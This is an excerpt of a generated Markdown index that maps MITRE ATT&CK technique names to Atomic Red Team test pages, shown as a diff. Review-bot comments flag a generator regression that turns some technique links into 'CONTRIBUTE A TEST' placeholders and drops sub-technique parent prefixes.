| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lifecycle-Triggered Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SMS Pumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Device Driver Discovery](../../T1652/T1652.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Content Injection](../../T1659/T1659.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Content Injection](../../T1659/T1659.md) | [Service Stop](../../T1489/T1489.md) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | [System Services: Systemctl](../../T1569.003/T1569.003.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
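Review bot: rows that previously linked to existing atomics are being regenerated as `CONTRIBUTE A TEST` placeholders, which is a regression in the generator rather than a content change. Reading each pair with the second row as the new output, `[Content Injection](../../T1659/T1659.md)` becomes `Content Injection [CONTRIBUTE A TEST]` in both the first and second row pairs, and `[System Services: Systemctl](../../T1569.003/T1569.003.md)` becomes `Systemctl [CONTRIBUTE A TEST]`. Unless the T1659 and T1569.003 test pages were removed in this commit, the new code's lookup from technique to `../../<id>/<id>.md` is missing entries; T1659 is a top-level technique and T1569.003 a sub-technique, so the miss is not tied to one ID shape, and it is worth checking how the Python port keys that lookup (ATT&CK name versus ID, or the "Parent: Sub-technique" display name versus the bare name). A cheap guard is a test that fails whenever the regenerated matrix contains more `CONTRIBUTE A TEST` cells than the committed one without a matching deletion under the test directories. Separately, the parent prefix is dropped (`System Services: Systemctl` to `Systemctl`); the old form should be kept so sub-techniques with common names stay distinguishable.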
@@ -32,7 +32,7 @@
| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | [Encrypted Channel](../../T1573/T1573.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Inter-Process Communication](../../T1559/T1559.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Container CLI/API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
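Review bot: the only change in this hunk is `[Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)` turning into `Outlook Rules [CONTRIBUTE A TEST]`, so the same lost-link and lost-prefix problem applies here and the link to T1137.005 should be preserved. The unchanged rows also show that the old output already used two naming conventions, a `Parent: Sub-technique` title for linked cells and a bare name for placeholders such as `Lua [CONTRIBUTE A TEST]` and `Web Portal Capture [CONTRIBUTE A TEST]`; whichever form the port intends should be documented in the generator so future diffs of this file are reviewable.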
@@ -58,7 +58,7 @@
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
